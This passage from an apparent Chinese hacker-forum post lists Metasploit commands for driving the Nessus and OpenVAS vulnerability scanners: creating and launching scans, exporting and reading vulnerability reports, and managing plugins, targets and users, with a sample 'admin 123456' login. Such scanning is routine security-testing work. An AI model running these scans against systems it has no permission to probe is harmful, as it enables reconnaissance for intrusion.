    81. nessus_scan_details 6 info # 查看扫描ID为6的扫描任务的详细信息
    82. nessus_scan_details 6 vulnerabilities # 查看扫描任务的漏洞详细信息
    83. nessus_scan_new <UUID of Policy> <Scan name> <Description> <Targets>
    84. # 创建新任务
    85. nessus_db_scan <policy ID> <scan name> <scan description> # 基于db_hosts表创建扫描任务
    86. nessus_db_scan_workspace <policy ID> <scan name> <scan description> <workspace>
    87. # 基于指定工作区的db_host表创建扫描任务
    88. # 运行扫描任务
    89. nessus_scan_launch <scan ID> # 启动任务
    90. nessus_scan_pause <scan id> # 暂停任务
    91. nessus_scan_pause_all # 暂停所有任务
    92. nessus_scan_stop <scan id> # 停止任务
    93. nessus_scan_stop_all # 停止所有扫描任务
    94. nessus_scan_list # 查看扫描任务列表
    95. nessus_scan_resume <scan id> # 恢复暂停的任务
    96. nessus_scan_resume_all # 恢复所有暂停的任务
    98. # 查看报告
    99. nessus_scan_export <scan ID> <export format> # 生成扫描报告
    100. nessus_scan_export_status <scan ID> <file ID> # 查看导出任务的状态
    102. # 分析报告
    103. nessus_report_hosts <scan ID> -S searchterm # 获取主机列表
    104. nessus_report_vulns <scan ID> # 获取漏洞列表
    105. nessus_report_host_details <scan ID> <host ID> # 获取指定主机的详细信息
    106. nessus_db_import <scan ID> # 导入报告
    108. # 管理插件
    109. nessus_family_list -S searchterm # 查看插件家族
    110. nessus_plugin_list <Family ID> # 查看插件
    111. nessus_plugin_details <Plugin ID> # 列出插件详细信息
    113. # 管理用户
    114. nessus_user_list # 查看现有用户
    115. nessus_user_passwd <User ID> <New Password> # 修改用户密码
    116. nessus_user_add <username> <password> <permissions> <type> # 添加用户,32、64和128;local或LDAP
    117. nessus_user_del <User ID> # 删除用户
    119. # 使用OpenVAS服务器
    120. openvas_connect admin 123456 127.0.0.1 9390 ok # 连接服务器
    122. # 查看服务器信息
    123. openvas_version # 查看版本
    124. openvas_config_list # 查看扫描配置
    125. openvas_disconnect # 断开连接
    127. # 管理扫描目标
    128. openvas_target_create <name> <hosts> <comment> # 创建扫描目标
    129. openvas_target_list # 查看目标列表
    130. openvas_target_delete <target_id> # 删除扫描目标
    132. # 管理扫描任务
    133. openvas_task_create <name> <comment> <config_id> <target_id># 创建扫描任务
    134. openvas_task_start <id> # 启动扫描任务
    135. openvas_task_stop <id> # 停止扫描任务
    136. openvas_task_list # 查看其状态
    137. openvas_task_pause <id> # 暂停扫描任务
    138. openvas_task_resume <id> # 恢复扫描任务
    139. openvas_task_resume_or_start <id> # 恢复或启动扫描任务
    140. openvas_task_delete <id> ok # 删除任务
    142. # 管理扫描报告
    143. openvas_format_list # 列出可用的报告格式
    144. openvas_report_list # 列出有效的报告
    145. openvas_report_download <report_id> <format_id> <path> <report_name>
    146. # 下载指定的报告
    147. openvas_report_import <report_id> <format_id> # 导入报告
    148. openvas_report_delete <id> # 删除报告
    复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Honkers

特级红客

关注
  • 3327
    主题
  • 36
    粉丝
  • 0
    关注
这家伙很懒,什么都没留下!

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行